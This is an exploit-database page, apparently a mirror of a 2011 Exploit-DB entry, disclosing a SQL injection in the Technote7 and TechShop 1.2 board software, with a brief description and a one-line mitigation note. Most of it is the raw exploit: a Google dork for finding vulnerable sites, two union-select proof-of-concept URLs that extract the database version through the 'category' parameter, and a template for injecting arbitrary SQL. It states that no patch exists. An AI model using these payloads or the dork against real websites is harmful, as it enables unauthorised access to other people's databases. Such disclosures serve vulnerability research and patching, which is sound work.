header-logo
Suggest Exploit
vendor:
Technote7, TechShop 1.2
by:
MaJ3stY
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Technote7, TechShop 1.2
Affected Version From: Technote7, TechShop 1.2
Affected Version To: The latest version of the current from
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All Windows, All Linux
2011

Technote7(Commercial Version, Free Version) <== SQL Injection Vulnerabilities

Technote7 and TechShop 1.2 are vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can allow the attacker to gain access to the database and execute malicious SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Technote7(Commercial Version, Free Version) <== SQL Injection  Vulnerabilities
# Google Dork: inurl:/technote/board.php?category=
# Date: 2011/01/02
# Author: MaJ3stY(http://maj3sty.tistory.com)
# Language : PHP 
# Software Link: http://www.technote.co.kr/php/technote1/board.php?board=consult&command=skin_insert&exe=insert_down_shop
# Version: Technote7, TechShop 1.2(The latest version of the current from)
# Tested on: All Windows, All Linux

PoC(Technote7) :
 
 http://localhost/board.php?board=skinmarket&category=11 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61--

PoC(Technote7 - Techshop 1.2) :

 http://localhost/board.php?board=agcmain&category=10 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

Exploit :

http://site/board.php?board=boarname&category=[SQL Line]